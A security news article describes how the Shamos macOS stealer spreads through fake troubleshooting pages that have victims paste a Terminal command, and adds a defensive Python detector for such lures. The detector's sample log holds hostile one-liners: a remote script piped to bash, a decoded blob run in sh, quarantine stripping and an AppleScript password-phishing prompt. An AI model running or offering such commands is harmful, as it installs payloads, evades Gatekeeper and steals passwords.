Cybercriminals are using deceptive tactics to trick Mac users into installing Shamos, a new variant of the Atomic macOS Stealer (AMOS) developed by a group tracked as COOKIE SPIDER. The campaign exploits users' desire for a quick fix: victims searching for help with a Mac problem are led to spoofed troubleshooting websites and GitHub repositories that mimic legitimate ones. There they are told to copy a one-line command and paste it into Terminal. Instead of fixing anything, the command fetches and runs the Shamos installer. Because the victim executes the command directly, the payload never passes through the Gatekeeper checks that apply to an app downloaded and opened from the Finder, so it installs silently without the warning a downloaded app would trigger and puts the user's data at immediate risk.
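The lure described above relies on a recognisable shape: a pasted command that fetches a remote script or decodes an embedded blob and pipes it straight into a shell, sometimes stripping the quarantine attribute or phishing the login password with an AppleScript dialog along the way. The following is an added example, not code from the article or from CrowdStrike, of a heuristic detector for that pattern run over constructed process-execution records (the sort of shell command lines an EDR or the macOS unified log would record). The regex rules and score weights are assumptions of this example, generic ClickFix-style indicators rather than indicators the article attributes to Shamos itself.

```python
"""Heuristic detector for ClickFix-style 'paste this into Terminal' commands.

Added example, not the article's or CrowdStrike's code. The sample log lines
below are constructed, and the rule set is a generic assumption about what
remote-script lures look like, not a signature for Shamos specifically.
"""
import re
from dataclasses import dataclass, field

# Each rule is (name, compiled regex). Scores are additive; see classify().
RULES = [
    # Remote fetch piped straight into an interpreter: curl/wget ... | sh/bash/zsh
    ("remote_script_to_shell",
     re.compile(r"\b(curl|wget)\b[^|]*\|\s*(sudo\s+)?(ba|z)?sh\b")),
    # Encoded payload decoded and executed in one line (macOS base64 also accepts -D)
    ("base64_decode_to_shell",
     re.compile(r"base64\s+(-d|--decode|-D)[^|]*\|\s*(sudo\s+)?(ba|z)?sh\b")),
    # Stripping the quarantine attribute so Gatekeeper never evaluates the file
    ("quarantine_strip",
     re.compile(r"\bxattr\s+(-c\b|-r?d\s+com\.apple\.quarantine\b)")),
    # AppleScript dialog used to phish the login password
    ("osascript_password_prompt",
     re.compile(r"\bosascript\b.*display dialog.*(hidden answer|password)", re.I)),
    # Bare IP or throwaway TLD in the fetched URL (weak signal on its own)
    ("ip_or_odd_tld_url",
     re.compile(r"https?://(\d{1,3}(\.\d{1,3}){3}|[^\s/]+\.(xyz|top|icu|click))")),
]

STRONG_WEIGHT = 3   # assumed weights for this example
WEAK_WEIGHT = 1


@dataclass
class Finding:
    line_no: int
    command: str
    rules: list = field(default_factory=list)
    score: int = 0
    verdict: str = "benign"


def classify(command: str, line_no: int = 0) -> Finding:
    """Score one command line against RULES and assign a verdict."""
    f = Finding(line_no=line_no, command=command.strip())
    for name, rx in RULES:
        if rx.search(f.command):
            f.rules.append(name)
    f.score = sum(WEAK_WEIGHT if r == "ip_or_odd_tld_url" else STRONG_WEIGHT
                  for r in f.rules)
    # A strong indicator plus anything else, or two strong indicators, is treated
    # as malicious; a single strong indicator is surfaced for review.
    if f.score >= 4:
        f.verdict = "malicious"
    elif f.score >= STRONG_WEIGHT:
        f.verdict = "suspicious"
    return f


def scan(lines) -> list:
    """Return a Finding for every line that matched at least one rule."""
    return [f for f in (classify(l, i + 1) for i, l in enumerate(lines)) if f.rules]


# Constructed sample process-execution records (not real telemetry).
SAMPLE_LOG = [
    "brew update && brew upgrade",
    "curl -fsSL https://example.xyz/fix.sh | bash",
    "echo 'ZWNobyBoaQ==' | base64 -d | sh",
    "xattr -c /tmp/helper && /tmp/helper",
    "osascript -e 'display dialog \"Enter password\" default answer \"\" with hidden answer'",
    "git clone https://github.com/example/repo.git",
]

if __name__ == "__main__":
    for f in scan(SAMPLE_LOG):
        print(f"line {f.line_no}: {f.verdict:10} score={f.score} rules={f.rules}")
```

Run stand-alone it flags four of the six sample lines and leaves the Homebrew and git commands alone. The weak URL rule exists only to lift a lone curl-to-shell from "suspicious" to "malicious" when the host looks disposable; tuning those weights against your own baseline of legitimate installer one-liners is the part that decides whether the rule is usable in production.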
Once installed, Shamos hunts for sensitive information such as browser-saved passwords, Apple Notes, Keychain items, and cryptocurrency wallets, and exfiltrates what it finds to attacker-controlled infrastructure. It is also a loader: the operators can use it to pull down further payloads, including a botnet module and a fake Ledger wallet app, so a single pasted command can lead both to an immediate data breach and to ongoing financial loss. That ability to fetch and install additional malicious software is what makes Shamos a particularly dangerous threat to Mac users.
To protect against such threats, users should never execute commands from untrusted sources. Any troubleshooting page that asks you to paste a command into Terminal, especially one that downloads a script and pipes it straight into a shell or decodes an encoded blob, should be treated as a red flag, and a GitHub repository is not proof of legitimacy since the attackers spoof those too. Verified solutions are available through official Apple support channels or reputable tech forums. Staying informed and sceptical of troubleshooting advice found online is the most effective way to prevent infection. Cybersecurity experts also recommend keeping security software up to date so that such activity can be detected and blocked, and applying regular system updates and strong password practices to further harden macOS devices against emerging threats like Shamos.